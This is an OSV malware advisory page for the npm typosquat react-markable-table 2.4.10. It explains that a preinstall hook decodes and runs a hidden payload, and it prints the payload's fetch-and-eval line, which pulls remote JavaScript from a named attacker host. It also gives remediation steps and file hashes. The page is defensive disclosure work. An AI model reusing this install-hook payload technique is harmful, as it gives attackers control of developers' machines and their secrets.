MAL-2026-10446

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-markable-table/MAL-2026-10446.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10446
Aliases
  • GHSA-37wc-pv88-9vwq
Published
2026-07-13T14:03:16Z
Modified
2026-07-13T19:01:56.532261015Z
Summary
Malicious code in react-markable-table (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (da0db97919f41757fe4bcdc456d52ec0ecfbb89741438e5805a7bf5188b022c5)

react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field wooorm/markdown-table). package.json declares a preinstall hook that runs node index.d.js. That script base64-decodes an embedded payload which resolves to eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text())), and invokes it via globalThis[tag](text) where tag is reconstructed from the char-code array [101,118,97,108] (spelling eval). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at npm install time.

Source: ghsa-malware (373a27a6be19dd10fb39202e0c947760568422ed70a9b47cd8b915036f158363)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-010245",
            "source": "amazon-inspector",
            "import_time": "2026-07-13T14:19:33.64750946Z",
            "modified_time": "2026-07-13T14:03:16Z",
            "sha256": "da0db97919f41757fe4bcdc456d52ec0ecfbb89741438e5805a7bf5188b022c5",
            "versions": [
                "2.4.10"
            ]
        },
        {
            "id": "GHSA-37wc-pv88-9vwq",
            "source": "ghsa-malware",
            "import_time": "2026-07-13T18:49:48.947232758Z",
            "modified_time": "2026-07-13T18:27:03Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "373a27a6be19dd10fb39202e0c947760568422ed70a9b47cd8b915036f158363"
        }
    ]
}
References
Credits

Affected packages

npm / react-markable-table

Package

Name
react-markable-table
View open source insights on deps.dev
Purl
pkg:npm/react-markable-table

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

2.*
2.4.10

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "838562b8c82f5a32bae9865b8d254d5d910f60c1748a47d71a2be57bad972870",
            "tlsh": "1ff0977a63e620b0f14410df58999001b346e1f276acc8bef52ec9c629aac50a6f53e1",
            "path": "index.d.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha1": "75f342b49c7ac6762881e1d133dd3433ea55e54f",
                "sha512_sri": "sha512-66q99i4oG/FdofOPPIDJksdHo8rEGkbZ8z3bnRmsRe5OHjVHVG2Tu+4Qmqp+XsSc++kv0D6j+IDeyQA3a/wZkA=="
            },
            "filename": "react-markable-table-2.4.10.tgz"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-markable-table/MAL-2026-10446.json"
cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]